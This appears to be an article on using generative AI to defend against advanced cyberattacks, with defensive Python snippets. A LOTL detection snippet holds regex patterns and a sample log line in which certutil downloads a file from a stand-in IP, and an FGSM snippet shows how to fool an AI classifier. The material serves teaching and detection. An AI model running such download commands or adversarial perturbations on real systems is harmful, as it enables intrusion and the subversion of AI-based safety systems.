
Strengthening Cybersecurity using Generative AI

Cybercrimes and Their Increasing Impact

In 2023, the United Kingdom’s (UK) military data breach exposed sensitive personal information of 225,000 personnel. In 2024, the United States (US) Department of Justice charged four foreign nationals for cyber-attacks targeting US agencies and defense contractors. In February 2024, a UnitedHealth subsidiary that processes insurance claims was hit by a ransomware attack. Several research outlets predict the economic impact of such cybercrimes will reach $15T by 2025, with a new attack happening every 14 seconds. The impact of such cybercrimes extends across communities worldwide, from private citizens to governments and from academia to business.

Cybercrimes are hard to detect (or respond to) because of the vast attack surface (all possible entry or attack points: data sources, software, devices, networks, social engineering, etc.), the modes of penetration (social engineering, denial of service, advanced persistent threats, etc.), and the duration of attacks. Cyber-criminals adopt ingenious high-tech methods, creating a complex web of attack modes. The NSA’s 2023 Cybersecurity report and the Department of Defense (DoD) 2023 Cyber Strategy report highlight the use of Artificial Intelligence (AI) by cyber-criminals to escalate their attack methods. Detection, localization and neutralization of such cyber-threats are not only difficult; on occasion, the threats go entirely unnoticed.

A Robust Cybersecurity Protocol Is Required

Cybersecurity, the practice that guards the connected world from cybercrimes, is essential for the world community. It encapsulates a charter to handle the complex interdependencies between policies, processes, technologies and people. Technology plays a pivotal role in securing critical resources and catching bad actors. A McKinsey report from 2022 reveals a $2 trillion market opportunity by 2025 for global cybersecurity technology and service providers. A recent survey report from Microsoft suggested that 58% of manufacturers rated cybersecurity vulnerability as a severe challenge to achieving the factory of the future.

Generative AI for Cybersecurity

Advanced cyber-threats require advanced cybersecurity. Generative AI coupled with deep-learning AI models offers a powerful mechanism for cybersecurity because it can analyze complex data sets, continuously learn evolving attack patterns, identify potential threats, and recommend mitigation and counterattack strategies.

Advanced cyber-attack methods:

Almost all advanced cyber-attack methods use metamorphism (or shape-shifting). They typically exhibit the following behavior on the vulnerable host system:

  • Minimal to zero unique footprint
  • Do not consume significant persistent resources (such as file storage)
  • Mimic or shape-shift into one or more legitimate software tool behaviors
  • Dynamic and simultaneous polymorphism (or multiple shape-shifts in parallel)

Such behavior dodges traditional anti-malware systems that rely on static techniques such as pattern matching, white-listing, hashing, or spotting foreign behavior patterns within the host system.
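
To make the limitation concrete, here is a minimal sketch of hash-based static detection (Python, with a made-up payload and signature list); a single-byte mutation, which polymorphic malware performs automatically, is enough to defeat it:

```python
import hashlib

# Tiny "signature database": SHA-256 hashes of known malicious payloads.
KNOWN_BAD_HASHES = {
    hashlib.sha256(b"malicious_payload_v1").hexdigest(),
}

def static_scan(payload: bytes) -> bool:
    """Flag the payload only if its hash matches a known signature."""
    return hashlib.sha256(payload).hexdigest() in KNOWN_BAD_HASHES

original = b"malicious_payload_v1"
mutated = b"malicious_payload_v2"   # functionally identical variant, one byte changed

print(static_scan(original))  # True:  the known sample is caught
print(static_scan(mutated))   # False: the trivially mutated variant slips through
```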

Let’s visit four such important advanced attack patterns that are difficult to detect using traditional cybersecurity methods and software tools.

Four advanced cyber-attack methods

Advanced Polymorphic Malware: Polymorphic malware is advanced malicious software that constantly modifies its code to evade detection. To achieve its disguise, it employs techniques like code obfuscation, dynamic encryption keys, and variable code structures. IoT and Software-Defined Everything (SDx) infrastructure face heightened security risks due to the vast array of outdated machine operating systems and custom scripts built to insecure software standards.

Fileless Attacks: Most traditional cyber-attacks install (or create) files on the computer disk. In contrast, fileless attacks operate entirely in memory and run within the memory segment of a legitimate but vulnerable host program (such as PowerShell, word processors, or the registry). Aqua Security’s 2023 Cloud Native Threat Report noted a 1,400% increase in fileless attacks over the previous year.
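
As an illustration only, the sketch below uses the psutil library to apply one simple fileless-execution heuristic: flag running processes whose on-disk executable image no longer exists. Real endpoint-detection tools inspect memory regions directly, and this check will raise false positives (for example, a binary upgraded while still running), so treat it as a starting point rather than a detector:

```python
import os
import psutil  # pip install psutil

def suspicious_processes():
    """Heuristic: a process whose executable path is missing on disk is a
    candidate for memory-only (fileless) execution."""
    flagged = []
    for proc in psutil.process_iter(["pid", "name", "exe"]):
        exe = proc.info.get("exe")
        if exe and not os.path.exists(exe):
            flagged.append((proc.info["pid"], proc.info["name"], exe))
    return flagged

if __name__ == "__main__":
    for pid, name, exe in suspicious_processes():
        print(f"[!] PID {pid} ({name}) runs from a missing image: {exe}")
```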

Living Off the Land (LOTL) Techniques: A Living Off the Land (LOTL) attack is a cyber-attack method that operates using legitimate software tools already deployed on the host system. Like fileless attacks, LOTL leaves no additional file footprint; however, it changes the composition of some existing files, leaving only a minimal footprint. LOTL’s ability to morph its activities to appear legitimate makes it the toughest to detect.
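
One way defenders approach LOTL is to score how legitimate tools are invoked rather than which files exist. The sketch below applies a hand-written, purely illustrative set of heuristics to process-creation command lines (the patterns, sample log lines and encoded string are hypothetical, not a vetted rule set):

```python
import re

# Hypothetical heuristics: legitimate ("living off the land") tools invoked in
# ways more typical of attackers than of administrators.
SUSPICIOUS_PATTERNS = [
    re.compile(r"powershell(\.exe)?\s+.*-enc(odedcommand)?\s", re.I),
    re.compile(r"certutil(\.exe)?\s+.*-urlcache\s+.*http", re.I),
    re.compile(r"rundll32(\.exe)?\s+.*javascript:", re.I),
]

def is_suspicious(cmdline: str) -> bool:
    """Return True if a process-creation command line matches a LOTL heuristic."""
    return any(p.search(cmdline) for p in SUSPICIOUS_PATTERNS)

log_lines = [
    "powershell.exe -NoProfile -EncodedCommand SQBFAFgA...",
    "certutil.exe -urlcache -split -f http://203.0.113.7/p.txt p.txt",
    "notepad.exe report.txt",
]
for line in log_lines:
    print(("SUSPICIOUS " if is_suspicious(line) else "benign     ") + line)
```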

Adversarial Attacks on AI Systems: This attack manipulates the data used to train an AI model, or the model itself, fooling the model into making incorrect or malicious decisions. For example, such attacks can compromise security cameras that use facial recognition, or autonomous-vehicle software that recognizes traffic lights.
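
A well-known instance of this class of attack is the Fast Gradient Sign Method (FGSM), which perturbs an input in the direction that most increases the model’s loss. The sketch below demonstrates the idea on a toy, untrained PyTorch classifier; the model, input and epsilon value are placeholders rather than a real vision system:

```python
import torch
import torch.nn as nn

# Toy classifier standing in for, e.g., a traffic-sign or face-recognition model.
model = nn.Sequential(nn.Flatten(), nn.Linear(28 * 28, 10))
model.eval()

def fgsm_perturb(x, label, epsilon=0.1):
    """FGSM: nudge the input along the sign of the loss gradient."""
    x = x.clone().detach().requires_grad_(True)
    loss = nn.functional.cross_entropy(model(x), label)
    loss.backward()
    return (x + epsilon * x.grad.sign()).clamp(0, 1).detach()

x = torch.rand(1, 1, 28, 28)   # stand-in "image"
y = torch.tensor([3])          # its true class
x_adv = fgsm_perturb(x, y)
print(model(x).argmax(1), model(x_adv).argmax(1))  # predictions may now differ
```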

Impact on Manufacturers

Analysis shows that manufacturing infrastructure is uniquely vulnerable to cyberattacks due to a combination of factors: continued use of old hardware, software and proprietary communication protocols that have not been hardened against modern cyber-attacks; reliance on varied automation technologies that operate at lower OSI (Open Systems Interconnection) layers (e.g., IoT, industrial control systems), whose integration layers create points of vulnerability; and prioritization of efficiency over security. The impact of a cyberattack, however, can cause manufacturers massive losses. For example, in 2023, Applied Materials, one of the world’s leading suppliers of equipment, services, and software for semiconductor manufacturing, warned that it would lose about $250 million due to a cybersecurity attack at one of its suppliers.

Many manufacturers struggle to implement robust security measures without disrupting critical operations, as operational technology (OT) systems require constant uptime and have limited maintenance windows. The potential for physical harm and safety risks adds another layer of complexity, as cyberattacks on OT systems can lead to equipment damage or even endanger human lives. Additionally, the shortage of personnel with both OT and cybersecurity expertise makes it difficult for manufacturers to adequately protect their industrial environments.

Generative AI-powered solutions:

A Generative Adversarial Network (GAN) is a class of generative artificial intelligence consisting of two parts, a generator and a discriminator, that work against each other. The generator creates new multi-modal data such as realistic images, code or text, and the discriminator (the generator’s adversary) tries to distinguish real data from the generated (or synthetic) data. Through this ongoing competition, both parts improve over time.

GANs are useful for training systems to recognize and defend against new types of cyber threats by detecting foreign, induced, synthetic or malicious data. Because the discriminator learns to differentiate real data from fake data, GAN-based algorithms offer a promising antidote to most of the advanced attack methods described above.
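
For readers who prefer code to prose, here is a minimal GAN training loop in PyTorch. The “real” data is a placeholder Gaussian standing in for benign network-flow features; the point is the adversarial structure itself, and the trained discriminator can later double as an anomaly scorer for unseen traffic:

```python
import torch
import torch.nn as nn

torch.manual_seed(0)
FEATURES, NOISE = 8, 16  # hypothetical flow features (bytes, duration, ports, ...)

# Generator: noise -> synthetic "network-flow" feature vector
G = nn.Sequential(nn.Linear(NOISE, 32), nn.ReLU(), nn.Linear(32, FEATURES))
# Discriminator: feature vector -> probability that it is real
D = nn.Sequential(nn.Linear(FEATURES, 32), nn.ReLU(), nn.Linear(32, 1), nn.Sigmoid())

opt_g = torch.optim.Adam(G.parameters(), lr=1e-3)
opt_d = torch.optim.Adam(D.parameters(), lr=1e-3)
bce = nn.BCELoss()

def real_batch(n=64):
    # Placeholder for real benign-traffic features.
    return torch.randn(n, FEATURES) * 0.5 + 2.0

for step in range(500):
    # Train the discriminator: real -> 1, synthetic -> 0.
    real = real_batch()
    fake = G(torch.randn(real.size(0), NOISE)).detach()
    loss_d = bce(D(real), torch.ones(real.size(0), 1)) + \
             bce(D(fake), torch.zeros(real.size(0), 1))
    opt_d.zero_grad(); loss_d.backward(); opt_d.step()

    # Train the generator: try to make the discriminator predict 1 for fakes.
    fake = G(torch.randn(64, NOISE))
    loss_g = bce(D(fake), torch.ones(64, 1))
    opt_g.zero_grad(); loss_g.backward(); opt_g.step()
```

In a security setting, the same generator can also be used to synthesize realistic attack variants as training data, which is one reason GANs appear in both defensive and offensive research.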

Adoption of Generative AI

Research & Analyst Community: Extensive research has been published on how Generative Adversarial Networks (GANs), or their improved versions, can create, mimic, and detect cyberattacks and their patterns. According to Google Scholar, roughly 23,000 technical papers on cybersecurity cite GANs, with 11,000+ in 2023 and 5,000+ thus far in 2024. According to the Google Patents site, roughly 1,400+ patents citing GANs were filed under cybersecurity in the last five years, with the highest CAGR of patent filings in IoT/OT security. IEEE has published a detailed survey, “Generative Adversarial Networks in Security”, explaining how GANs provide both security advances and attack scenarios designed to bypass detection systems [Ref: https://ieeexplore.ieee.org/document/9298135]. Forrester’s report “Top 5 Cybersecurity Threats for 2024: Weaponized AI Is the New Normal” likewise identifies the use of Generative AI in general and GANs in particular.

Business Community: Palo Alto Networks’ 2024 report on AI & Security, Splunk’s 2024 State of Security report, Cisco’s 2024 Threat Trends report, and reports from other major technology vendors ranging from network equipment to enterprise software show a significant acceleration in adopting (and offering) Generative AI capabilities to address cybersecurity challenges.

Government & Security Establishment: DARPA and NSA, key players in cybersecurity AI research, are exploring GANs to create realistic cyberattack simulations for training and potentially develop defensive AI.

Large Language Models

The advent of a new class of Generative AI models, the Large Language Model (LLM), has opened a new avenue for bolstering cybersecurity capabilities against advanced cyber-attacks. LLMs analyze and understand massive data (such as network traffic logs, malware code, etc.) to detect patterns and communicate in human-understandable language. LLMs, unlike GANs, do not create new data, but manipulate and combine existing data patterns to create human-readable content. LLMs thus offer the cybersecurity community an ability that complements GANs. LLMs are pre-trained on massive and disparate data sources. However, a drawback of LLMs is hallucination caused by this generic training data. There are methods to reduce hallucination by grounding the model with additional context, such as retrieval-augmented generation (RAG), prompting and fine-tuning.

LLMs can perform the critical role of a true “intelligent entity” that preserves the communication (or problem) context across vast, disparate data sources, distributed computation nodes, and long periods of time. Such an ability is uniquely handy when a complex web of attack methods is used.
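
The grounding idea mentioned above can be illustrated with a short retrieval-augmented triage sketch. It assumes the OpenAI Python client (v1+) with an API key in the environment; the model name, the keyword “retriever” and the knowledge snippets are placeholders for a production vector store and prompt library:

```python
from openai import OpenAI  # pip install openai

client = OpenAI()  # assumes OPENAI_API_KEY is set in the environment

# Stand-in knowledge base; a real deployment would query a vector store.
KNOWLEDGE = {
    "lotl": "LOTL abuse often shows encoded PowerShell or certutil downloads.",
    "fileless": "Fileless attacks run from memory; the process image may be missing on disk.",
}

def retrieve(query: str) -> str:
    """Naive keyword retrieval standing in for semantic search (RAG grounding)."""
    return "\n".join(v for k, v in KNOWLEDGE.items() if k in query.lower())

def triage(log_excerpt: str, query: str = "possible lotl activity") -> str:
    prompt = (
        "You are a SOC analyst assistant. Using only the context below, classify "
        "the log excerpt as benign or suspicious and explain why.\n\n"
        f"Context:\n{retrieve(query)}\n\nLog excerpt:\n{log_excerpt}"
    )
    resp = client.chat.completions.create(
        model="gpt-4o-mini",  # placeholder model name
        messages=[{"role": "user", "content": prompt}],
    )
    return resp.choices[0].message.content

print(triage("powershell.exe -EncodedCommand SQBFAFgA..."))
```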

The use of LLMs for cybersecurity is a nascent but heavily invested topic.

Conclusion

Cybersecurity is a high-priority topic with a massive market size (spanning private investments, business institutions, academia and government grants). It also demands highly advanced, Artificial Intelligence-based innovative solutions to mitigate the risk. The combination of Generative Adversarial Network (GAN) models and Large Language Models (LLMs) can provide advanced cybersecurity capabilities for detecting and neutralizing advanced cyber-attacks. There is a great opportunity for start-ups to focus on this area. I predict that soon there will be a massive upside for individuals and entities that focus on cybersecurity with AI.

Taking a broader view of the cybersecurity challenges, it is important for every company to start with a cybersecurity protocol that includes a dedicated team of experts responsible for overall cybersecurity. Typically, they are led by a Chief Information Security Officer (CISO), who should be given the autonomy to establish a “security dome”. The CISO group should chair a cross-functional team drawn from the finance, operations and strategy domains. This allows creating an execution plan that balances business outcomes with the security protocol.
